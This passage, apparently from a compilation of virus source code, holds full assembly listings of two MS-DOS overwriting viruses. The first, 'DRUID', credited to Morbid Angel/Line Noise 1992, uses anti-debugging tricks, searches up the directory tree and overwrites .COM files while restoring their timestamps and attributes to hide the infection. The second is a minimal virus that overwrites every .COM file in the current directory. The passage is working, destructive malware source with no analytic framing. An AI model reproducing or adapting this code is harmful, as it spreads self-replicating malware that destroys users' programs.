  4988. start:
  4989.                 mov     ax,2EBh        ; used to baffle sourcer...
  4990.                 jmp     $-2            ;
  4991.  
  4992.                 mov     dx,offset newint ; set int1 to newint
  4993.                 mov     ax,2501h
  4994.                 int     21h
  4995.  
  4996.                 mov     al,3           ; set int3 to newint
  4997.                 int     21h
  4998.  
  4999.                 mov     dx,offset newint  ; do it again...
  5000.                 mov     ax,2501h
  5001.                 int     21h
  5002.                 mov     al,1
  5003.                 int     21h
  5004.  
  5005.                 mov     ah,47h         ; get current directory
  5006.                 xor     dl,dl          ; and save it
  5007.                 lea     si,currdir
  5008.                 int     21h
  5009.  
  5010. again:
  5011.  
  5012.                 lea     dx,fmask
  5013.                 mov     ah,4Eh         ; Find first *.COM
  5014. getfile:
  5015.                 int     21h
  5016.  
  5017.                 jnc     found_ok       ;if ok, goto found_ok
  5018.                 jmp     short bailout  ;if no more files, goto bail out
  5019.                 nop
  5020. found_ok:
  5021.                 mov     si,fname       ; load filename into ax
  5022.                 lodsw
  5023.                 cmp     ax,'OC'        ; if first 3 letters is "CO"
  5024.                                        ; as in "COMMAND.COM"
  5025.                 jne     infect         ; if not, go on
  5026.                 jmp     getnext        ; else, get another file
  5027.  
  5028.                 mov     ax,2EBh        ; used to baffle sourcer...
  5029.                 jmp     $-2
  5030. infect:
  5031.                 mov     dx,fname       ; get attribute
  5032.                 mov     ax,4300h       ; of the file found
  5033.                 int     21h
  5034.                 push    cx             ; and save it
  5035.  
  5036.                 xor     cx,cx          ; reset attributes
  5037.                 mov     ax,4301h
  5038.                 int     21h
  5039.  
  5040.                 mov     ax,2EBh        ; used to baffle sourcer...
  5041.                 jmp     $-2
  5042.  
  5043.                 mov     dx,fname       ; open file
  5044.                 mov     ax,3D02h
  5045.                 int     21h            ; DOS Services  ah=function 3Dh
  5046.                                        ;  open file, al=mode,name@ds:dx
  5047.                 jc      getnext        ; if error, skip to loc_5
  5048.  
  5049.                 xchg    ax,bx          ; get handle in bx
  5050.  
  5051.                 mov     ax,5700h       ; get time'n date
  5052.                 int     21h
  5053.                 push    dx             ; save'em
  5054.                 push    cx
  5055.  
  5056.                 mov     ah,40h         ; write virus to target
  5057.                 mov     cx,virlen      ; number of bytes to write
  5058.                 mov     dx,fname       ; pointer to file
  5059.                 int     21h
  5060.  
  5061.                 pop     cx             ; restore the date'n time
  5062.                 pop     dx
  5063.                 mov     ax,5701h
  5064.                 int     21h
  5065.  
  5066.                 mov     ah,3Eh         ; close target
  5067.                 int     21h
  5068.  
  5069.                 pop     cx             ; restore the attributes
  5070.                 mov     ax,4301h
  5071.                 mov     dx,fname
  5072.                 int     21h
  5073. getnext:
  5074.                 mov     ah,4Fh         ; get next file matching *.COM
  5075.                 jmp     short getfile
  5076. bailout:
  5077.                 mov     ax,2EBh        ; used to baffle sourcer...
  5078.                 jmp     $-2
  5079.  
  5080.                 lea     dx,dot_dot     ; "cd.."
  5081.                 mov     ah,3Bh
  5082.                 int     21h
  5083.  
  5084.                 jc      exit           ; if error, goto exit
  5085.                 jmp     short again    ; do it all over again
  5086. exit:
  5087.                 mov     ax,2EBh        ; used to baffle sourcer...
  5088.                 jmp     $-2
  5089.  
  5090.                 mov     ah,3Bh         ; change back to
  5091.                 lea     dx,return_dir  ; original directory
  5092.                 int     21h
  5093.  
  5094.                 mov     ax,4C00h       ; quit to dos with
  5095.                 int     21h            ; errorlevel 0
  5096.  
  5097. id  db      ' DRUID, coded by Morbid Angel/Line Noise -92 in Stockholm/Sweden'
  5098.  
  5099. druid           endp
  5100.  
  5101. newint          proc    far            ; replaces INT1 and INT3
  5102.                 iret                   ; with this.
  5103. newint          endp
  5104.  
  5105. fmask           db      '*.COM',0
  5106. dot_dot         db      '..',0
  5107. return_dir      db      '\'            ; the slash is used when
  5108. currdir         dw      32 dup (?)     ; returning to old dir.
  5109.  
  5110. vend            equ     $
  5111. virlen          equ     vend - vstart
  5112.  
  5113. seg_a           ends
  5114.                 end     start
  5115.  
  5116.  
  5117. done
  5118.  
  5119. data_1e        equ    9Eh            ; (996E:009E=0)
  5120.   
  5121. seg_a        segment    byte public
  5122.         assume    cs:seg_a, ds:seg_a
  5123.   
  5124.   
  5125.         org    100h
  5126.   
  5127. COPYR        proc    far
  5128.   
  5129. start:
  5130.         mov    ah,4Eh            ; 'N'
  5131.         mov    cl,20h            ; ' '
  5132.         mov    dx,offset data_3    ; (996E:0128=2Ah)
  5133.         int    21h            ; DOS Services  ah=function 4Eh
  5134.                         ;  find 1st filenam match @ds:dx
  5135. loc_1:
  5136.         mov    dx,data_1e        ; (996E:009E=0)
  5137.         mov    ax,3D01h
  5138.         int    21h            ; DOS Services  ah=function 3Dh
  5139.                         ;  open file, al=mode,name@ds:dx
  5140.         mov    bx,ax
  5141.         mov    dx,offset ds:[100h]    ; (996E:0100=0B4h)
  5142.         mov    cl,2Eh            ; '.'
  5143.         mov    ah,40h            ; '@'
  5144.         int    21h            ; DOS Services  ah=function 40h
  5145.                         ;  write file cx=bytes, to ds:dx
  5146.         mov    ah,3Eh            ; '>'
  5147.         int    21h            ; DOS Services  ah=function 3Eh
  5148.                         ;  close file, bx=file handle
  5149.         mov    ah,4Fh            ; 'O'
  5150.         int    21h            ; DOS Services  ah=function 4Fh
  5151.                         ;  find next filename match
  5152.         jnc    loc_1            ; Jump if carry=0
  5153.         int    20h            ; Program Terminate
  5154. data_3        db    2Ah
  5155.         db     2Eh, 43h, 4Fh, 4Dh, 00h
  5156.   
  5157. COPYR        endp
  5158.   
  5159. seg_a        ends
  5160.   
  5161.   
  5162.   
  5163.         end    start
  5164.  
  5165. done
  5166.  
  5167.